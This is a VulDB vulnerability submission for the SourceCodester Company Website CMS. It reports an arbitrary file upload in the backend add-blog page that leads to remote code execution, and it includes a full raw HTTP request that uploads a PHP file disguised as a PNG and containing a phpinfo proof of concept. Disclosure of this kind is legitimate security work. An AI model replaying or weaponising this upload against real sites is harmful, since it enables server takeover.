Soumettre #43177: Company website CMS------backend blog management RCEinformation

TitreCompany website CMS------backend blog management RCE
Descriptioninfo:There is an arbitrary file upload vulnerability in the company's website CMS background add-blog Add a blog in the background, upload attachments, capture packets, and modify the attachment suffix to php as needed. Modify the content of the attachment to realize RCE by php code getshell. Then traverse the URL:/dashboard/uploads/blog/xxxxx.php access payload: POST /dashboard/add-blog.php HTTP/1.1 Host: 192.168.153.1:8090 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------2960604280433651870831976 Content-Length: 674 Origin: http://192.168.153.1:8090 Connection: close Referer: http://192.168.153.1:8090/dashboard/add-blog.php Cookie: PHPSESSID=0n5rjh4b6tqupjl95toh92f4jb Upgrade-Insecure-Requests: 1 -----------------------------2960604280433651870831976 Content-Disposition: form-data; name="blog_title" t1 -----------------------------2960604280433651870831976 Content-Disposition: form-data; name="blog_desc" t2 -----------------------------2960604280433651870831976 Content-Disposition: form-data; name="blog_detail" t3 -----------------------------2960604280433651870831976 Content-Disposition: form-data; name="ufile"; filename="123.php" Content-Type: image/png <?php phpinfo();?> -----------------------------2960604280433651870831976 Content-Disposition: form-data; name="save" -----------------------------2960604280433651870831976--
La source⚠️ https:// www.sourcecodester.com/php/15517/company-website-cms-php.html
Utilisateur
 jsbae3449 (UID 30775)
Soumission09/08/2022 16:54 (il y a 4 ans)
Modérer09/08/2022 18:54 (2 hours later)
StatutAccepté
Entrée VulDB205882 [SourceCodester Company Website CMS Add Blog /dashboard/add-blog.php ufile élévation de privilèges]
Points20

Do you want to use VulDB in your project?

Use the official API to access entries easily!